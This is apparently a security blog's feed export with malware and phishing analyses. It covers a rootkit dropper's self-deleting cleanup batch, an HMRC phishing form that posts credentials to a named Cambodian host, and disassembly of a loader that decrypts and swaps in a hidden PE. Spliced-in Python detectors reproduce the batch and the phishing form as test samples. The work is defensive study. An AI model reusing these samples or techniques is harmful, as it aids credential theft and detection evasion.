UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--></div>
<div style="text-align: left;">
<br />
<b><span style="font-family: 'Times New Roman', serif; font-size: 12.0pt;">SHUTDOWN FILE</span></b><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: 'Times New Roman', serif; font-size: 12.0pt;">The shutdown file, as its name implies, is a small executable created and launched by the dropper. Its specific purpose is to forcefully shut down the system; when the machine starts again, the maliciously modified partition is executed and thus loads the rootkit driver.</span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdNQcyDQtIpSZN9qSeicqtwMBon_Yzv_KRZwD98m0zM8SU1kKkEgs2Z256DVXEgJAUSHF4UK5MyS8t8Yd3mlWvpjs9s-VqRFR0eEZHu31ayym_zEfu7E4WNpR_rrpaW8SVbF8T2oga-A/s1600/shutdownCODE.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdNQcyDQtIpSZN9qSeicqtwMBon_Yzv_KRZwD98m0zM8SU1kKkEgs2Z256DVXEgJAUSHF4UK5MyS8t8Yd3mlWvpjs9s-VqRFR0eEZHu31ayym_zEfu7E4WNpR_rrpaW8SVbF8T2oga-A/s320/shutdownCODE.jpg" width="320" /></a></div>
</div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<div style="text-align: left;">
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<b><span style="font-family: 'Times New Roman', serif; font-size: 12.0pt;">ATTRIBUTE MODIFIER</span></b></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: 'Times New Roman', serif; font-size: 12.0pt;">A small batch file with a randomly generated name is created and invoked at the very end of the dropper's execution. Its purpose is to delete the dropper and then delete itself, to reduce the chance of detection.</span></div>
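As an added illustration (not code from this post or from the sample), the following Python triage check flags the self-deleting cleanup batch pattern described above: a `del`/`erase` of an executable combined with a `del` of the batch file's own path (`%0`, `%~f0`). The batch contents and file paths are constructed stand-ins, since the post does not reproduce the real file.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a hypothetical stand-in for the tiny cleanup batch
# described in the post (real contents are not reproduced on the page).
SAMPLE_BATCH = r"""@echo off
:loop
del "C:\Users\victim\AppData\Local\Temp\dropper.exe"
if exist "C:\Users\victim\AppData\Local\Temp\dropper.exe" goto loop
del "%~f0"
"""

# Constructed benign batch for comparison.
BENIGN_BATCH = r"""@echo off
echo Backing up logs
copy C:\logs\*.log D:\backup\
"""

# Tokens a batch file uses to refer to its own path.
SELF_REFS = ("%0", "%~f0", "%~dpnx0", "%~nx0")

# Matches a del/erase line, skipping optional switches such as /f /q,
# and captures the target argument.
DEL_RE = re.compile(
    r'^\s*(?:del|erase)\b(?:\s+/\w+)*\s+(.+?)\s*$',
    re.IGNORECASE | re.MULTILINE,
)

# Labels and "if exist ... goto" are the usual way a cleanup batch
# retries the delete until the parent process has exited.
LABEL_RE = re.compile(r'^\s*:\w+', re.MULTILINE)
RETRY_RE = re.compile(r'\bif\s+exist\b.*\bgoto\b', re.IGNORECASE)


@dataclass
class BatchVerdict:
    deletes_self: bool = False
    deleted_executables: list = field(default_factory=list)
    retry_loop: bool = False

    @property
    def suspicious(self) -> bool:
        # Deleting another executable AND itself is the cleanup idiom we care about.
        return self.deletes_self and bool(self.deleted_executables)


def analyze_batch(text: str) -> BatchVerdict:
    """Classify a batch script by what it deletes."""
    verdict = BatchVerdict()
    for match in DEL_RE.finditer(text):
        target = match.group(1).strip().strip('"')
        if any(ref.lower() in target.lower() for ref in SELF_REFS):
            verdict.deletes_self = True
        elif target.lower().endswith((".exe", ".dll", ".scr")):
            verdict.deleted_executables.append(target)
    if LABEL_RE.search(text) and RETRY_RE.search(text):
        verdict.retry_loop = True
    return verdict


if __name__ == "__main__":
    for name, content in (("sample", SAMPLE_BATCH), ("benign", BENIGN_BATCH)):
        v = analyze_batch(content)
        print(f"{name}: suspicious={v.suspicious} self_delete={v.deletes_self} "
              f"retry_loop={v.retry_loop} deleted={v.deleted_executables}")
```

In an incident, the same check can be run over batch files recovered from temp directories or from a forensic image, with the deleted-executable path pointing you at the dropper to recover.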
<!--[if gte mso 10]>
<![endif]--><br />
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiraUiYEt8-tTBPxwHH9FZMvrB416J0FhnP5Fl60-_k3l8VgFvOi4bNxvDAxwucj61Y4JABAjvflE6_OOTg3uYuSxoHZGWubzTo2XKjcHgPwrxeaPvzFaOThvRyOfeEYO1D8YDimlnuW5c/s1600/attrib.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiraUiYEt8-tTBPxwHH9FZMvrB416J0FhnP5Fl60-_k3l8VgFvOi4bNxvDAxwucj61Y4JABAjvflE6_OOTg3uYuSxoHZGWubzTo2XKjcHgPwrxeaPvzFaOThvRyOfeEYO1D8YDimlnuW5c/s320/attrib.jpg" width="320" /></a></div>
</div>
Anonymous http://www.blogger.com/profile/15262957865496243491 noreply@blogger.com 0
tag:blogger.com,1999:blog-1227934427004236933.post-2085908428203466213 2013-08-28T02:41:00.003-07:00 2013-08-28T03:02:47.637-07:00
Phishing targets HM Revenue & Customs clients
A new phishing campaign targets HM Revenue & Customs clients. HM Revenue & Customs (HMRC) is the UK government department responsible for collecting the UK's taxes.
<br />
<br />
The phishing email looks like this:
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_3L04Rpw_-2AWeyLiYyMJt-_uxGkf2Z3GtjBd1hd27hdxQdv0ErSdDI1FvsCGoYKhxiF1VpcdU_1Kw7YYhFgn1xtaeqD0jlZ6M3ZM_L-kC5tvQQK8LOCKw8KEjG-yhy9xwzJL5JQLDn6/s1600/email.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_3L04Rpw_-2AWeyLiYyMJt-_uxGkf2Z3GtjBd1hd27hdxQdv0ErSdDI1FvsCGoYKhxiF1VpcdU_1Kw7YYhFgn1xtaeqD0jlZ6M3ZM_L-kC5tvQQK8LOCKw8KEjG-yhy9xwzJL5JQLDn6/s1600/email.png" /></a>
<br />
<br />
It carries a zip archive attachment containing an HTML file named <b>HM Revenue & Customs - Details.html</b>.
<br />
<br />
Once the HTML file is opened, it shows this form:
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkM0W4ohzUiwxx5JFCvSpgihVouLVabLqSjclU0qgBNTxBDgpaxsAQ1-eZH9Y1tvxseLuXFYZ0XCnBOehSzEY-pwLRmRAJLvfbEinnFDovjoM7EYPK8dwtJtsO6WI_Xdg9cSQ3W-igq3fU/s1600/form.png" imageanchor="1" ><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkM0W4ohzUiwxx5JFCvSpgihVouLVabLqSjclU0qgBNTxBDgpaxsAQ1-eZH9Y1tvxseLuXFYZ0XCnBOehSzEY-pwLRmRAJLvfbEinnFDovjoM7EYPK8dwtJtsO6WI_Xdg9cSQ3W-igq3fU/s1600/form.png" /></a>
<br />
<br />
The form looks legitimate because it loads its images directly from the HMRC website.
<br />
<br />
When submitted, all the information entered is sent to <pre class="brush:plain">h00p://nagios.net1.com.kh/nagiosweb/Lang.php</pre>
<br />
<br />
At the time of writing, the site the information is sent to has probably been taken down, as it now returns a 404.
<br />
<br />
A simple whois query on the server shows:
<br />
<br />
<pre class="brush:plain">
domain: nagios.net1.com.kh
current ip: 202.131.87.67
nameserver: ns1.cambotech.com
nameserver: ns2.cambotech.com
reverse lookup domains based on ip:
nagios.net1.com.kh
crm.netone.com.kh
</pre>
<br />
The server is located in Cambodia.
<br />
<br />
No malware file was downloaded. Everything was plain and simple phishing and credential theft.
<br />
<br />
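The tell-tale sign of this kit is that the brand images come from the real HMRC site while the form posts to an unrelated host. The following added example (my code, not the phishing kit's) checks an HTML attachment for exactly that mismatch; the two HTML samples are constructed, the suffix table and the "sensitive field" name hints are my own heuristics.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the attachment described above: brand images
# come from the real HMRC site, the form posts to the unrelated host named in
# the post (kept defanged as h00p://, exactly as the post writes it).
PHISH_HTML = """
<html><body>
<img src="https://www.hmrc.gov.uk/images/hmrc_logo.gif">
<form method="post" action="h00p://nagios.net1.com.kh/nagiosweb/Lang.php">
  <input name="cardnumber"> <input name="sortcode">
  <input name="password" type="password"> <input type="submit" value="Submit">
</form>
</body></html>
"""

# Constructed benign counterpart: same images, the form posts to the brand's own domain.
LEGIT_HTML = """
<html><body>
<img src="https://www.hmrc.gov.uk/images/hmrc_logo.gif">
<form method="post" action="https://online.hmrc.gov.uk/login">
  <input name="userid"> <input name="password" type="password">
</form>
</body></html>
"""

# Suffixes under which registration happens one label deeper. Deliberately tiny;
# a real tool would use the Public Suffix List.
SECOND_LEVEL_SUFFIXES = {"co.uk", "gov.uk", "org.uk", "ac.uk", "com.kh", "net.kh", "org.kh"}
# Input names that suggest the form harvests credentials or payment data.
SENSITIVE_HINTS = ("pass", "pin", "card", "sort", "account", "cvv", "nino", "user")


def registered_domain(host):
    """Reduce a hostname to its registrable domain (heuristic, see above)."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def host_of(url):
    """Hostname of an absolute URL, or '' for relative ones (nothing to compare)."""
    netloc = urlparse(url).netloc
    return netloc.rsplit("@", 1)[-1].split(":")[0] if netloc else ""


class FormCollector(HTMLParser):
    """Collect form actions, image sources and input fields from the document."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.image_srcs, self.inputs = [], [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "img" and a.get("src"):
            self.image_srcs.append(a["src"])
        elif tag == "input":
            self.inputs.append((a.get("name") or "", (a.get("type") or "text").lower()))


def analyze(html):
    """Flag a page whose sensitive form posts to a domain that serves none of its images."""
    p = FormCollector()
    p.feed(html)
    form_domains = sorted({registered_domain(host_of(u)) for u in p.form_actions if host_of(u)})
    image_domains = sorted({registered_domain(host_of(u)) for u in p.image_srcs if host_of(u)})
    sensitive = [n for n, t in p.inputs
                 if t == "password" or any(h in n.lower() for h in SENSITIVE_HINTS)]
    mismatched = [d for d in form_domains if d not in image_domains]
    return {
        "form_domains": form_domains,
        "image_domains": image_domains,
        "sensitive_fields": sensitive,
        "mismatched_domains": mismatched,
        "suspicious": bool(mismatched) and bool(sensitive),
    }
```

Run `analyze()` over the HTML inside a mail attachment before it reaches a user; a sensitive form whose action domain serves none of the page's own images is worth quarantining for review.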
Unknown noreply@blogger.com 0
tag:blogger.com,1999:blog-1227934427004236933.post-6857702306201709905 2013-08-15T19:45:00.001-07:00 2013-08-16T03:24:18.177-07:00
Bank of America spam: An Analysis
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMTkQLzufOKTJkTEnlf6KqAfh2zIbnHOSdmeRfmeQ6NLSNTn-7g_ZO-kDAPSe6EyuqhU9112P3pHoDbyd7c8lY_dAilmUPRqX05G0P3QOvNAkGxaEJxp8xaE_XmVCPlij3ebk06A4ukJo0/s1600/imageedit_1_5408479753.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMTkQLzufOKTJkTEnlf6KqAfh2zIbnHOSdmeRfmeQ6NLSNTn-7g_ZO-kDAPSe6EyuqhU9112P3pHoDbyd7c8lY_dAilmUPRqX05G0P3QOvNAkGxaEJxp8xaE_XmVCPlij3ebk06A4ukJo0/s1600/imageedit_1_5408479753.jpg" /></a></div>
An email claiming to be from Bank of America lures users into opening an attachment that supposedly explains how to open secure emails from the bank. The message claims this is a security measure for transmitting confidential information.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpq_O9d3YEPHnlyN4swBmvEj0-hilxsVHXfGWlY-tRHXF7-g-4LQN3lQEvu5lxsO5SfhauWgEWRdGdJKf5dlOMNCfyZcpFChQpiK53flS6UFs6OKSB29oJ9kQwFLrGGX1_w1lb-IygJUte/s1600/sample+email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpq_O9d3YEPHnlyN4swBmvEj0-hilxsVHXfGWlY-tRHXF7-g-4LQN3lQEvu5lxsO5SfhauWgEWRdGdJKf5dlOMNCfyZcpFChQpiK53flS6UFs6OKSB29oJ9kQwFLrGGX1_w1lb-IygJUte/s640/sample+email.png" /></a></div>
<br />
<br />
The message contains an attachment: a zip archive <b>Instructions Secured E-mail.zip</b> containing an executable <b>Instructions Secured E-mail.exe</b> whose icon mimics that of Adobe PDF files.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFOg9HeRyYjE73Lr0FcZ6-5MBb3Ebkxc3ogXtZhUp13bwYEv2Q6x9RX0WY2ikAtttLBsTja4I5V14RWJ7xNmoiLHCzdlJdo1WB918KBD7zqy57p8yTUyOi5Sd2Mcb6-XuzvliVtuwZlpVB/s1600/icon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFOg9HeRyYjE73Lr0FcZ6-5MBb3Ebkxc3ogXtZhUp13bwYEv2Q6x9RX0WY2ikAtttLBsTja4I5V14RWJ7xNmoiLHCzdlJdo1WB918KBD7zqy57p8yTUyOi5Sd2Mcb6-XuzvliVtuwZlpVB/s1600/icon.png" /></a></div>
<br />
<br />
The file's version details show neither a program name nor a company name.
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvck9nEHodnCkUr_MNr2XlkCPeyWIHYptU-FmgHskKP5seI8v8NYcgAtZ9HRD51iyxaNsF3zV-gRDT9xsQoGTIV5gxCnDUjvjsND-srR_wjeI6z_SCPpdlnI4Dk4_yYg-g1TEOW3D1B1WD/s1600/file+details.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvck9nEHodnCkUr_MNr2XlkCPeyWIHYptU-FmgHskKP5seI8v8NYcgAtZ9HRD51iyxaNsF3zV-gRDT9xsQoGTIV5gxCnDUjvjsND-srR_wjeI6z_SCPpdlnI4Dk4_yYg-g1TEOW3D1B1WD/s1600/file+details.png" /></a></div>
<br />
<br />
<b>The Technical Part</b>
<br />
<br />
The executable begins by decrypting a couple of data blobs into newly allocated memory; the decrypted code dynamically resolves the APIs it will use later. This initially yields these APIs:
<br />
<br />
<pre class="brush: asm">
CPU Dump
Address Value Comments
00240698 756A4BC6 ; kernel32.LoadLibraryA
0024069C 756A1225 ; kernel32.GetModuleHandleA
002406A0 756A1202 ; kernel32.GetProcAddress
002406A4 756A34EC ; kernel32.VirtualProtect
002406A8 756A1801 ; kernel32.VirtualAlloc
002406AC 756A183E ; kernel32.VirtualFree
002406B0 756A13D0 ; kernel32.CloseHandle
002406B4 756C9597 ; kernel32.CreateToolhelp32Snapshot
002406B8 756A14FA ; kernel32.GetModuleFileNameA
002406BC 756ACA6E ; kernel32.CreateFileA
002406C0 756A177B ; kernel32.SetFilePointer
002406C4 756A1856 ; kernel32.ReadFile
002406C8 756A11D8 ; kernel32.GetCurrentProcessId
002406CC 75725F19 ; kernel32.Module32First
002406D0 75726002 ; kernel32.Module32Next
002406D4 756A14DD ; kernel32.GetProcessHeap
002406D8 756A1126 ; kernel32.WaitForSingleObject
002406DC 779BDEC6 ; ntdll.RtlAllocateHeap
</pre>
<br />
<br />
While at it, notable bugs can be seen when it attempts to import more APIs: the simple string decryption is incomplete, so GetProcAddress is called with mangled names such as "HeapFrfe" and "FetTickCmunt" (see the comments below).
<br />
<br />
<pre class="brush: asm">
seg000:0000005B pop edi
seg000:0000005C add edi, 0Dh
seg000:0000005F inc byte ptr [edi]
seg000:00000061 dec byte ptr [edi+1]
seg000:00000064 dec byte ptr [edi+2]
seg000:00000067 dec byte ptr [edi+4]
seg000:0000006A push edi ; result: HeapAlloc
seg000:0000006B push ebx
seg000:0000006C call dword ptr [ebp+8] ; GetProcAddress
seg000:0000006F mov [esi], eax
seg000:00000071 add edi, 0Ah
seg000:00000074 dec byte ptr [edi] ; byte decrypt
seg000:00000076 inc byte ptr [edi+1]
seg000:00000079 dec byte ptr [edi+2]
seg000:0000007C inc byte ptr [edi+3]
seg000:0000007F dec byte ptr [edi+4]
seg000:00000082 dec byte ptr [edi+5]
seg000:00000085 neg byte ptr [edi+6] ; BUG here
seg000:00000088 not byte ptr [edi+7]
seg000:0000008B push edi ; result: "HeapFrfe"
seg000:0000008C push ebx
seg000:0000008D call dword ptr [ebp+8] ; GetProcAddress
seg000:00000090 mov [esi+4], eax
seg000:00000093 add edi, 9
seg000:00000096 not byte ptr [edi] ; BUG here
seg000:00000098 not byte ptr [edi+1]
seg000:0000009B not byte ptr [edi+2]
seg000:0000009E dec byte ptr [edi+8]
seg000:000000A1 push edi ; result: FetTickCmunt
seg000:000000A2 push ebx
seg000:000000A3 call dword ptr [ebp+8] ; GetProcAddress
</pre>
<br />
<br />
Next, the file carries an embedded encrypted PE file of 0x16e00 (93,696) bytes. The code allocates memory of that size, reads the encrypted data from its own file on disk and decrypts it there.
<br />
<br />
<pre class="brush: asm">
seg000:0000065A push 4
seg000:0000065C push 1000h
seg000:00000661 push edi ; size = 16e00 (93696 bytes)
seg000:00000662 push 0
seg000:00000664 call dword ptr [ebp+10h] ; VirtualAlloc
seg000:00000667 mov esi, eax
seg000:00000669 sub esp, 104h
seg000:0000066F mov edi, esp
seg000:00000671 push 104h
seg000:00000676 push edi
seg000:00000677 push ebx
seg000:00000678 call dword ptr [ebp+20h] ; GetModuleFileName store to stack
seg000:0000067B push 0
seg000:0000067D push 80h
seg000:00000682 push 3
seg000:00000684 push 0
seg000:00000686 push 1
seg000:00000688 push 80000000h
seg000:0000068D push edi
seg000:0000068E call dword ptr [ebp+24h] ; CreateFileA - opens our file GENERIC_READ
seg000:00000691 add esp, 104h
seg000:000000EA mov edi, eax
seg000:000000EC push 0
seg000:000000EE push 0
seg000:000000F0 push dword ptr [ebp+6Ch]
seg000:000000F3 push edi
seg000:000000F4 call dword ptr [ebp+28h] ; SetFilePointer - start of encrypted dump 0x46ec file offset
seg000:000000F7 mov ecx, [ebp+70h]
seg000:000000FA push 0
seg000:000000FC push esp
seg000:000000FD pop eax
seg000:000000FE push dword ptr [esp]
seg000:00000101 push eax
seg000:00000102 push ecx
seg000:00000103 push esi
seg000:00000104 push edi
seg000:00000105 call dword ptr [ebp+2Ch] ; ReadFile size=16e00
seg000:00000108 pop eax
seg000:00000109 push edi
seg000:0000010A call dword ptr [ebp+18h] ; CloseHandle
seg000:0000010D call decryptAPEFile
</pre>
<br />
<br />
It then replaces the whole running process image with this new PE file, copying it section by section:
<br />
1. Use the VirtualProtect API to change the section's memory protection to allow writing.
<br />
2. Copy the section's code and data, using the virtual size indicated in the PE section header.
<br />
3. Restore the memory protection.
<br />
<br />
<pre class="brush: asm">
seg000:00000139 push eax
seg000:0000013A push esp
seg000:0000013B push 4
seg000:0000013D push edi
seg000:0000013E push ebx
seg000:0000013F call dword ptr [ebp+0Ch] ; VirtualProtect replace protection with write
seg000:00000142 push esp
seg000:00000143 push 2
seg000:00000145 push edi
seg000:00000146 push ebx
seg000:00000147 push esi
seg000:00000148 mov ecx, edi
seg000:0000014A mov edi, ebx
seg000:0000014C rep movsb ; replace first 512 bytes of running process with new PE
seg000:0000014E pop esi
seg000:0000014F call dword ptr [ebp+0Ch] ; VirtualProtect - replace rights with readonly
seg000:00000152 pop eax
seg000:00000153 mov ecx, esi
